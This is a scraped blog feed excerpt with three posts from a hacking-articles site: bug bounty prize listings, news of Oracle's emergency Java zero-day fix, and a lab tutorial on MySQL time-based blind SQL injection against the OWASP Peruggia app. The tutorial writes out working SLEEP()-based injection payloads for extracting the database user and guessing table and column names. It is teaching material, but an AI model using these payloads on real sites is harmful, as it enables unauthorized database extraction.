&lt;li&gt;Microsoft Internet Explorer, either:&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or&lt;/li&gt;
&lt;li&gt;IE 9 on Windows 7:&amp;nbsp;&amp;nbsp;$75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;Mozilla Firefox on Windows 7:&amp;nbsp;&amp;nbsp;$60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Apple Safari on OS X Mountain Lion:&amp;nbsp;&amp;nbsp;$65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;Web Browser Plug-ins using Internet Explorer 9 on Windows 7&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;li&gt;Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
On the other hand, Google is arranging its own competition with the name of &lt;b&gt;Pwnium 3&lt;/b&gt;. Pwnium 3 focuses on finding vulnerabilities in Chrome OS and is offering a more-than-generous $3.14159 million is reward. This particular competition will be based on Samsung S5 550 Chromebook running the latest version of Chrome OS. You will need to successfully exploit the browser or system of the device logged in as a guest or a user or "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.&lt;br /&gt;
&lt;br /&gt;
Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.&lt;br /&gt;
&lt;br /&gt;
Our own bounty hunter and ethical hacker Rafay Baloch has done so many a times and has been awarded with &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2012/12/paypal-pays-me-total-bounty-of-10000.html" target="_blank"&gt;prize money from PayPal&lt;/a&gt;&lt;/b&gt;, job offers from big-shot companies and cell phones from Nokia. A proud people we are!&lt;br /&gt;
&lt;br /&gt;
Rafay Baloch and his team members (including I) have made it our mission to spread awareness regarding &lt;b&gt;Ethical Hacking &lt;/b&gt;and its advantages. Believe us people, its always better to do the right thing and get paid, then do the wrong one and get caught.&lt;br /&gt;
&lt;br /&gt;
Let the hunting begin!&lt;br /&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=vOjnppjEYCE:OImY-cjWOxA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=vOjnppjEYCE:OImY-cjWOxA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/vOjnppjEYCE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8040287862778617892/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/the-rise-of-ethical-hackers-let-bounty.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8040287862778617892?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8040287862778617892?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/vOjnppjEYCE/the-rise-of-ethical-hackers-let-bounty.html" title="The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-TrKNWySxTtQ/UTiH2T9t2HI/AAAAAAAABAQ/Nd8Fsv47UHo/s72-c/hacking.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/the-rise-of-ethical-hackers-let-bounty.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UAQngzeip7ImA9WhBRFk0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7891281434166141308</id><published>2013-03-06T12:20:00.002-08:00</published><updated>2013-03-06T12:20:43.682-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-06T12:20:43.682-08:00</app:edited><title>Java Zero-Day Vulnerabilities Fixed By Oracle</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s1600/target-java.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s400/target-java.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;We recently &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank"&gt;reported two Java zero-day vulnerabilities&lt;/a&gt; &lt;/b&gt;that were spotted in the wild by &lt;b&gt;FireEye&lt;/b&gt; now identified as the CVE-2013-1493 and CVE-2013-0809. One of these (CVE-2103-1493) was exploited by hackers to install McRat, an executable file, onto the user's machine and was therefore found to be more critical than the other.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update. But active exploitation of the above stated vulnerabilities has driven the company to roll out an &lt;b&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" rel="nofollow" target="_blank"&gt;Emergency update&lt;/a&gt;&lt;/b&gt;.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="color: black;"&gt;The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013).&amp;nbsp;&amp;nbsp;However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" style="color: black;"&gt;&lt;span style="color: black;"&gt;Security Alert&lt;/span&gt;&lt;/a&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;span style="font-family: inherit;"&gt;Previously, we suggested our users to uninstall Java if they didn't wanna be preyed upon via the McRat executable file but Oracle has been kind enough to provide us with a more suitable option to install the new version of Java or autoupdate it.&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="color: black;"&gt;Desktop users should also be aware that Oracle has recently switched&amp;nbsp;&lt;/span&gt;&lt;a href="http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html" style="color: black;"&gt;&lt;span style="color: black;"&gt;Java security settings to “high”&lt;/span&gt;&lt;/a&gt;&lt;span style="color: black;"&gt;&amp;nbsp;by default.&amp;nbsp;&amp;nbsp;This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed.&amp;nbsp;&amp;nbsp;As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet.&amp;nbsp;&amp;nbsp;In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;We would request our readers to update their versions of Java as soon as possible to refrain from being attacked. As they say, 'Prevention is better than cure'!&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=-iOmkK2t1WI:ungFqDO7h44:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=-iOmkK2t1WI:ungFqDO7h44:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/-iOmkK2t1WI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7891281434166141308/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerabilities-fixed-by.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7891281434166141308?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7891281434166141308?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/-iOmkK2t1WI/java-zero-day-vulnerabilities-fixed-by.html" title="Java Zero-Day Vulnerabilities Fixed By Oracle" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-C1Cwmo4khzc/UTehP3cuilI/AAAAAAAABAA/tv-SIP55Zus/s72-c/target-java.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerabilities-fixed-by.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UAQns_eCp7ImA9WhBRFUs.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4414845610786175504</id><published>2013-03-06T02:20:00.003-08:00</published><updated>2013-03-06T02:20:43.540-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-06T02:20:43.540-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection" /><title>MySQL Injection Time Based</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s1600/sqlinjection+(1).jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="154" src="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s320/sqlinjection+(1).jpg" width="320" /&gt;&lt;/a&gt;We have already written a couple of posts on SQL Injection techniques, Such as "&lt;a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank"&gt;SQL Injection Union Based&lt;/a&gt;", "&lt;a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank"&gt;Blind SQL Injection&lt;/a&gt;" and last but not least &lt;b&gt;"&lt;a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank"&gt;Common problems faced while performing SQL Injection&lt;/a&gt;", &lt;/b&gt;However how could the series miss the "&lt;b&gt;Time based SQL injection"&lt;/b&gt; technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to&amp;nbsp;@yappare.&lt;br /&gt;
&lt;br /&gt;
Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
http://technet.microsoft.com/en-us/library/cc512676.aspx&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Tested on Peruggia application.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Lets gO!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://1.bp.blogspot.com/-InCWjnswhHI/UTazR5jtJOI/AAAAAAAAAYY/MEwS2vwU1Ss/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="318" src="http://1.bp.blogspot.com/-InCWjnswhHI/UTazR5jtJOI/AAAAAAAAAYY/MEwS2vwU1Ss/s640/1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
each DBMS have different type of function to use,but the steps usually quite similar.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
In MSSQL we use WAITFOR DELAY&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
In POSTGRES we use PG_DELAY()&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
and so on..do check it on pentestmonkey cheatsheet :D&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Test it using this command&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and sleep(5)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-xQ310OdKpfE/UTazRAxBmfI/AAAAAAAAAYQ/oOBnlLPPInY/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://4.bp.blogspot.com/-xQ310OdKpfE/UTazRAxBmfI/AAAAAAAAAYQ/oOBnlLPPInY/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;Lets proceed to check the current user.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Here's the command the we are going to use&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-70KPJOhOAqE/UTazRQQl8SI/AAAAAAAAAYM/JPQscOLjV3M/s1600/3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="577" src="http://4.bp.blogspot.com/-70KPJOhOAqE/UTazRQQl8SI/AAAAAAAAAYM/JPQscOLjV3M/s640/3.png" width="601" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Because the 1st character of the current user start with 'p'.. not 'a' or 'h'&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Then you can proceed to check for its 2nd character and so on.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;so on..&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;So go on with table_name guessing.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-MqHmGEmhX_8/UTazSIp78pI/AAAAAAAAAYk/HK23MX_nMks/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="http://3.bp.blogspot.com/-MqHmGEmhX_8/UTazSIp78pI/AAAAAAAAAYk/HK23MX_nMks/s640/4.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;How about guessing the column_name?Its easy.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-xPFn4uZgdTU/UTazSUQS5UI/AAAAAAAAAY4/-uSuR_pWg-M/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="http://4.bp.blogspot.com/-xPFn4uZgdTU/UTazSUQS5UI/AAAAAAAAAY4/-uSuR_pWg-M/s640/5.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
See the image above?Still need any explanation? I bet you guys already understand it! :D&lt;/div&gt;
